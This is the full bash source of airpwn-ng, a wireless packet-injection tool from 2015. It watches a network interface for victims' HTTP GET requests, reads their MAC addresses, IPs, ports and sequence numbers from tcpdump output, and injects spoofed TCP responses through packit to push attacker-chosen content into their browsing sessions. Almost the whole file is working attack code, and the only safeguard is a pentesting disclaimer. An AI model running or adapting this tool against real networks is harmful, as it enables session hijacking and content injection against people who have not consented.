#!/usr/bin/env bash

##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Repetitious Functions ~~~~~~~~~~~~~~~~~~~~~~~~~~~##
mon--()
{
	## src MAC -- Victim
	vicmac=$(awk -v i0="$i0" '{print $i0}' $LOGFILE | cut -d: -f 2-)
	## src MAC -- Router LAN MAC
	rtrmac=$(awk -v i1="$i1" '{print $i1}' $LOGFILE | cut -d: -f 2-)
	## src IP -- Victim
	vicip=$(awk -v i2="$i2" '{print $i2}' $LOGFILE | cut -d. -f -4)
	## src port -- Victim
	vicport=$(awk -v i2="$i2" '{print $i2}' $LOGFILE | cut -d. -f 5-)
	## dst IP -- Server
	svrip=$(awk -v i3="$i3" '{print $i3}' $LOGFILE | cut -d. -f -4)
	## svr port -- Server
	svrport=$(awk -v i3="$i3" '{print $i3}' $LOGFILE | cut -d. -f 5- | sed 's/://')
	## sequence number + length
	acknum=$(awk -v i4="$i4" '{print $i4}' $LOGFILE | cut -d: -f2 | sed 's/,//')
	## old acknowledgement number
	seqnum=$(awk -v i5="$i5" '{print $i5}' $LOGFILE | sed 's/,//')
}

tap--()
{
	## src MAC -- Victim
	vicmac=$(awk '{print $1}' $LOGFILE | cut -d: -f 1-)
	## src MAC -- Router LAN MAC
	rtrmac=$(awk '{print $3}' $LOGFILE | cut -d: -f 1- | tr -d ',')
	## src IP -- Victim
	vicip=$(awk '{print $9}' $LOGFILE | cut -d. -f -4)
	## src port -- Victim
	vicport=$(awk '{print $9}' $LOGFILE | cut -d. -f 5-)
	## dst IP -- Server
	svrip=$(awk '{print $11}' $LOGFILE | cut -d. -f -4)
	## svr port -- Server
	svrport=$(awk '{print $11}' $LOGFILE | cut -d. -f 5- | tr -d ':')
	## sequence number + length
	acknum=$(awk '{print $15}' $LOGFILE | cut -d: -f2 | sed 's/,//')
	## old acknowledgement number
	seqnum=$(awk '{print $17}' $LOGFILE | sed 's/,//')
}
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Launch Conditions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
wrn="\033[31m"   ## Warnings / Infinite Loops
ins="\033[1;32m" ## Instructions
out="\033[1;33m" ## Outputs
hdr="\033[1;34m" ## Headers
inp="\033[36m"   ## Inputs
wtf="\033[34m"   ## WTFs
rst="\e[0m"      ## Reset
current_ver=1.4
rel_date="4 May 2015"

if [[ "$UID" -ne 0 ]];then
        echo -e "$wrn\nMust be ROOT to run this script$rst"
        exit 1
fi

if [[ -z $1  || -z $2 || -z $3 ]]; then
	echo -e "$ins\nUsage: ./airpwn-ng <Inject File> <Sniff NIC> <Inject NIC>$rst"
	exit 1
fi
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MAIN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## Make RAMFS for faster processing
### Too lazy to clean this up now, will case later...
LOGFILE=/tmp/airpwn_ram/LOG
DIR_EXISTS=$(ls -l /tmp/airpwn_ram | wc -l)
if [[ $DIR_EXISTS -gt 0 ]]; then
	TMPFS_MOUNTED=$(df -h | grep tmpfs | grep airpwn | wc -l)
	if [ $TMPFS_MOUNTED -eq 1 ]; then
		echo "[*] RAMFS Mounted"
	else
		mount -t tmpfs -o size=10M tmpfs /tmp/airpwn_ram
		echo "[*] RAMFS Mounted"
	fi

else
	mkdir /tmp/airpwn_ram
	TMPFS_MOUNTED=$(df -h | grep tmpfs | grep airpwn | wc -l)
	if [[ $TMPFS_MOUNTED -eq 1 ]]; then
		echo "[*] RAMFS Mounted"
	else
		mount -t tmpfs -o size=10M tmpfs /tmp/airpwn_ram
		echo "[*] RAMFS Mounted"
	fi

fi

## Prepare the hex inject string
inject=$(echo "0x$(cat $1 | xxd -g1 -ps | fold -w2 | paste -sd ' ')")

if [[ $2 != tap* ]];then
	## Prepare the indexes
	tcpdump -i $2 -c 1 -eKnSt 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' 1>LOG
	sed 's/ /\r\n/g' LOG | cat -n > dump-results
	index=$(grep -E 'BSSID:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}' dump-results | awk '{print $1}')
	rm -rf dump-results LOG
	i0=$(expr $index + 1)
	i1=$(expr $index + 2)
	i2=$(expr $index + 20)
	i3=$(expr $index + 22)
	i4=$(expr $index + 26)
	i5=$(expr $index + 28)

	while true; do
		nice -n -20 tcpdump -i $2 -c 1 -eKnSt 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' 1>$LOGFILE &
		nice -n -20 inotifywait -r -e modify $LOGFILE
		mon--
		
		## inject the packet
		nice -n -20 packit -i $3 -R -nnn -a $acknum -D $vicport -F PA -q $seqnum -S $svrport -d $vicip -s $svrip -X $rtrmac -Y $vicmac -p "$inject"
	done
else
	while true; do
		nice -n -20 tcpdump -i $2 -c 1 -eKnSt 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' 1>$LOGFILE &
		nice -n -20 inotifywait -r -e modify $LOGFILE
		tap--
		
		## inject the packet
		nice -n -20 packit -i $3 -R -nnn -a $acknum -D $vicport -F PA -q $seqnum -S $svrport -d $vicip -s $svrip -X $rtrmac -Y $vicmac -p "$inject"
	done
fi
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~ File and License Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## Filename: airpwn-ng
## Copyright (C) <2015>  <stryngs>

##  This program is free software: you can redistribute it and/or modify
##  it under the terms of the GNU General Public License as published by
##  the Free Software Foundation, either version 3 of the License, or
##  (at your option) any later version.

##  This program is distributed in the hope that it will be useful,
##  but WITHOUT ANY WARRANTY; without even the implied warranty of
##  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
##  GNU General Public License for more details.

##  You should have received a copy of the GNU General Public License
##  along with this program.  If not, see <http://www.gnu.org/licenses/>.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##

##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Legal Notice ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## This script was written with the intent for Legal PenTesting uses only.
## Make sure that you have consent prior to use on a device other than your own.
## Doing so without the above is a violation of Federal/State Laws within the United States of America.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##

##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thoughts... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## I consider any script/program I write to always be a work in progress.
## Please send any tips/tricks/streamlining ideas/comments/kudos via email to: info [AT] ethicalreporting.org

## Comments written with a triple # are notes to myself, please ignore them.
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##


##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits and Kudos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
## First and foremost, to God above for giving me the abilities I have, Amen.

## Kudos to my wife for always standing by my side, having faith in me, and showing the greatest of patience for my obsession with hacking.

## toast and his excellent work with the original concept of airpwn.  airpwn-ng wouldn't exist without the original work done by him...
## Thank you for allowing me to have the privilege of the original name.  I hope this script lives up to what it should be!

## The wireshark community for it's excellent String Matching Capture Filter Generator
	# https://www.wireshark.org/tools/string-cf.html

## Jack64 for his excellent help and eagerness to improve this.  Thank you for the help mate...

## blind for the excellent work at finding the wireshark URL that helped with parsing the GET / function for airpwn-ng

## xmnr for the idea to issue a nice of -20 throughout the script

## Kryczek for the idea to use airtun-ng as the last mile solution for injection

## The "Community" for always working towards improving the existing.....
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
